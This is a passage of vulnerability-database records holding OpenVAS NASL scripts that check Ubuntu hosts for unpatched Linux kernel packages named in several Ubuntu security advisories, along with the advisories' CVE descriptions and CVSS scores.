possibly execute arbitrary\ncode with administrative privileges. (CVE-2016-8633)\n\nMarco Grassi discovered that the TCP implementation in the Linux kernel\nmishandles socket buffer (skb) truncation. A local attacker could use this\nto cause a denial of service (system crash). (CVE-2016-8645)\n\nDaxing Guo discovered a stack-based buffer overflow in the Broadcom\nIEEE802.11n FullMAC driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly gain\nprivileges. (CVE-2016-8658)\n\nAndrey Konovalov discovered that the SCTP implementation in the Linux\nkernel improperly handled validation of incoming data. A remote attacker\ncould use this to cause a denial of service (system crash). (CVE-2016-9555)\n\nIt was discovered that the __get_user_asm_ex implementation in the Linux\nkernel for x86/x86_64 contained extended asm statements that were\nincompatible with the exception table. A local attacker could use this to\ngain administrative privileges. (CVE-2016-9644)\");\n script_tag(name:\"affected\", value:\"linux-snapdragon on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3161-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3161-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1042-snapdragon\", ver:\"4.4.0-1042.46\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1042.34\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9191", "CVE-2017-2584", "CVE-2017-6074", "CVE-2016-10088", "CVE-2017-2583", "CVE-2016-9588", "CVE-2017-5549"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-02-22T00:00:00", "id": "OPENVAS:1361412562310843062", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843062", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3208-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-xenial USN-3208-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843062\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-22 15:14:53 +0100 (Wed, 22 Feb 2017)\");\n script_cve_id(\"CVE-2016-10088\", \"CVE-2016-9191\", \"CVE-2016-9588\", \"CVE-2017-2583\",\n \"CVE-2017-2584\", \"CVE-2017-5549\", \"CVE-2017-6074\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3208-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3208-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that the generic SCSI block layer in the Linux kernel did\nnot properly restrict write operations in certain situations. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly gain administrative privileges. (CVE-2016-10088)\n\nCAI Qian discovered that the sysctl implementation in the Linux kernel did\nnot properly perform reference counting in some situations. An unprivileged\nattacker could use this to cause a denial of service (system hang).\n(CVE-2016-9191)\n\nJim Mattson discovered that the KVM implementation in the Linux kernel\nmismanages the #BP and #OF exceptions. A local attacker in a guest virtual\nmachine could use this to cause a denial of service (guest OS crash).\n(CVE-2016-9588)\n\nAndy Lutomirski and Willy Tarreau discovered that the KVM implementation in\nthe Linux kernel did not properly emulate instructions on the SS segment\nregister. A local attacker in a guest virtual machine could use this to\ncause a denial of service (guest OS crash) or possibly gain administrative\nprivileges in the guest OS. (CVE-2017-2583)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel\nimproperly emulated certain instructions. A local attacker could use this\nto obtain sensitive information (kernel memory). (CVE-2017-2584)\n\nIt was discovered that the KLSI KL5KUSB105 serial-to-USB device driver in\nthe Linux kernel did not properly initialize memory related to logging. A\nlocal attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2017-5549)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the DCCP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly gain administrative\nprivileges. (CVE-2017-6074)\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3208-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3208-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-generic\", ver:\"4.4.0-64.85~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-generic-lpae\", ver:\"4.4.0-64.85~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-lowlatency\", ver:\"4.4.0-64.85~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-powerpc-e500mc\", ver:\"4.4.0-64.85~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-powerpc-smp\", ver:\"4.4.0-64.85~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-powerpc64-emb\", ver:\"4.4.0-64.85~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-powerpc64-smp\", ver:\"4.4.0-64.85~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.64.50\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.64.50\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.64.50\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.64.50\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.64.50\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.64.50\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.64.50\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9191", "CVE-2017-2584", "CVE-2017-6074", "CVE-2016-10088", "CVE-2017-2583", "CVE-2016-9588", "CVE-2017-5549"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-02-22T00:00:00", "id": "OPENVAS:1361412562310843061", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843061", "type": "openvas", "title": "Ubuntu Update for linux USN-3208-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3208-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843061\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-22 15:14:45 +0100 (Wed, 22 Feb 2017)\");\n script_cve_id(\"CVE-2016-10088\", \"CVE-2016-9191\", \"CVE-2016-9588\", \"CVE-2017-2583\",\n \"CVE-2017-2584\", \"CVE-2017-5549\", \"CVE-2017-6074\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3208-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the generic SCSI block layer in the Linux kernel did\nnot properly restrict write operations in certain situations. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly gain administrative privileges. (CVE-2016-10088)\n\nCAI Qian discovered that the sysctl implementation in the Linux kernel did\nnot properly perform reference counting in some situations. An unprivileged\nattacker could use this to cause a denial of service (system hang).\n(CVE-2016-9191)\n\nJim Mattson discovered that the KVM implementation in the Linux kernel\nmismanages the #BP and #OF exceptions. A local attacker in a guest virtual\nmachine could use this to cause a denial of service (guest OS crash).\n(CVE-2016-9588)\n\nAndy Lutomirski and Willy Tarreau discovered that the KVM implementation in\nthe Linux kernel did not properly emulate instructions on the SS segment\nregister. A local attacker in a guest virtual machine could use this to\ncause a denial of service (guest OS crash) or possibly gain administrative\nprivileges in the guest OS. (CVE-2017-2583)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel\nimproperly emulated certain instructions. A local attacker could use this\nto obtain sensitive information (kernel memory). (CVE-2017-2584)\n\nIt was discovered that the KLSI KL5KUSB105 serial-to-USB device driver in\nthe Linux kernel did not properly initialize memory related to logging. A\nlocal attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2017-5549)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the DCCP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly gain administrative\nprivileges. (CVE-2017-6074)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3208-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3208-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1048-snapdragon\", ver:\"4.4.0-1048.52\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-generic\", ver:\"4.4.0-64.85\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-generic-lpae\", ver:\"4.4.0-64.85\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-lowlatency\", ver:\"4.4.0-64.85\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-powerpc-e500mc\", ver:\"4.4.0-64.85\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-powerpc-smp\", ver:\"4.4.0-64.85\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-powerpc64-emb\", ver:\"4.4.0-64.85\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-64-powerpc64-smp\", ver:\"4.4.0-64.85\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.64.68\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.64.68\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.64.68\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.64.68\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.64.68\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.64.68\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.64.68\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1048.40\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7097", "CVE-2016-8633", "CVE-2016-6213", "CVE-2016-4568", "CVE-2015-8964", "CVE-2016-9555", "CVE-2016-8630", "CVE-2016-9178", "CVE-2016-7425", "CVE-2016-8658", "CVE-2016-7042", "CVE-2016-8645"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-21T00:00:00", "id": "OPENVAS:1361412562310843001", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843001", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-3161-3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-3161-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843001\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-21 05:45:34 +0100 (Wed, 21 Dec 2016)\");\n script_cve_id(\"CVE-2015-8964\", \"CVE-2016-4568\", \"CVE-2016-6213\", \"CVE-2016-7042\",\n\t\t\"CVE-2016-7097\", \"CVE-2016-7425\", \"CVE-2016-8630\", \"CVE-2016-8633\",\n\t\t\"CVE-2016-8645\", \"CVE-2016-8658\", \"CVE-2016-9178\", \"CVE-2016-9555\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-3161-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Tilman Schmidt and Sasha Levin discovered a\n use-after-free condition in the TTY implementation in the Linux kernel. A local\n attacker could use this to expose sensitive information (kernel memory).\n (CVE-2015-8964)\n\nIt was discovered that the Video For Linux Two (v4l2) implementation in the\nLinux kernel did not properly handle multiple planes when processing a\nVIDIOC_DQBUF ioctl(). A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2016-4568)\n\nCAI Qian discovered that shared bind mounts in a mount namespace\nexponentially added entries without restriction to the Linux kernel's mount\ntable. A local attacker could use this to cause a denial of service (system\ncrash). (CVE-2016-6213)\n\nOndrej Kozina discovered that the keyring interface in the Linux kernel\ncontained a buffer overflow when displaying timeout events via the\n/proc/keys interface. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2016-7042)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem\nimplementation in the Linux kernel did not clear the setgid bit during a\nsetxattr call. A local attacker could use this to possibly elevate group\nprivileges. (CVE-2016-7097)\n\nMarco Grassi discovered that the driver for Areca RAID Controllers in the\nLinux kernel did not properly validate control messages. A local attacker\ncould use this to cause a denial of service (system crash) or possibly gain\nprivileges. (CVE-2016-7425)\n\nIt was discovered that the KVM implementation for x86/x86_64 in the Linux\nkernel could dereference a null pointer. An attacker in a guest virtual\nmachine could use this to cause a denial of service (system crash) in the\nKVM host. (CVE-2016-8630)\n\nEyal Itkin discovered that the IP over IEEE 1394 (FireWire) implementation\nin the Linux kernel contained a buffer overflow when handling fragmented\npackets. A remote attacker could use this to possibly execute arbitrary\ncode with administrative privileges. (CVE-2016-8633)\n\nMarco Grassi discovered that the TCP implementation in the Linux kernel\nmishandles socket buffer (skb) truncation. A local attacker could use this\nto cause a denial of service (system crash). (CVE-2016-8645)\n\nDaxing Guo discovered a stack-based buffer overflow in the Broadcom\nIEEE802.11n FullMAC driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly gain\nprivileges. (CVE-2016-8658)\n\nIt was discovered that an information leak existed in __get_user_asm_ex()\nin the Linux kernel. A local attacker could use this to expose sensitive\ninformation. ( ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3161-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3161-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1038-raspi2\", ver:\"4.4.0-1038.45\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1038.37\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7097", "CVE-2016-8633", "CVE-2016-6213", "CVE-2016-9555", "CVE-2016-8630", "CVE-2016-7425", "CVE-2016-9313", "CVE-2016-8645"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-21T00:00:00", "id": "OPENVAS:1361412562310842999", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842999", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-3162-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-3162-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842999\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"creation_date\", value:\"2016-12-21 05:45:19 +0100 (Wed, 21 Dec 2016)\");\n script_cve_id(\"CVE-2016-6213\", \"CVE-2016-7097\", \"CVE-2016-7425\", \"CVE-2016-8630\",\n\t\t\"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2016-9313\", \"CVE-2016-9555\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-3162-2\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"CAI Qian discovered that shared bind mounts\n in a mount namespace exponentially added entries without restriction to the\n Linux kernel's mount table. A local attacker could use this to cause a denial\n of service (system crash). (CVE-2016-6213)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem\nimplementation in the Linux kernel did not clear the setgid bit during a\nsetxattr call. A local attacker could use this to possibly elevate group\nprivileges. (CVE-2016-7097)\n\nMarco Grassi discovered that the driver for Areca RAID Controllers in the\nLinux kernel did not properly validate control messages. A local attacker\ncould use this to cause a denial of service (system crash) or possibly gain\nprivileges. (CVE-2016-7425)\n\nIt was discovered that the KVM implementation for x86/x86_64 in the Linux\nkernel could dereference a null pointer. An attacker in a guest virtual\nmachine could use this to cause a denial of service (system crash) in the\nKVM host. (CVE-2016-8630)\n\nEyal Itkin discovered that the IP over IEEE 1394 (FireWire) implementation\nin the Linux kernel contained a buffer overflow when handling fragmented\npackets. A remote attacker could use this to possibly execute arbitrary\ncode with administrative privileges. (CVE-2016-8633)\n\nMarco Grassi discovered that the TCP implementation in the Linux kernel\nmishandles socket buffer (skb) truncation. A local attacker could use this\nto cause a denial of service (system crash). (CVE-2016-8645)\n\nIt was discovered that the keyring implementation in the Linux kernel\nimproperly handled crypto registration in conjunction with successful key-\ntype registration. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2016-9313)\n\nAndrey Konovalov discovered that the SCTP implementation in the Linux\nkernel improperly handled validation of incoming data. A remote attacker\ncould use this to cause a denial of service (system crash). (CVE-2016-9555)\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3162-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3162-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n 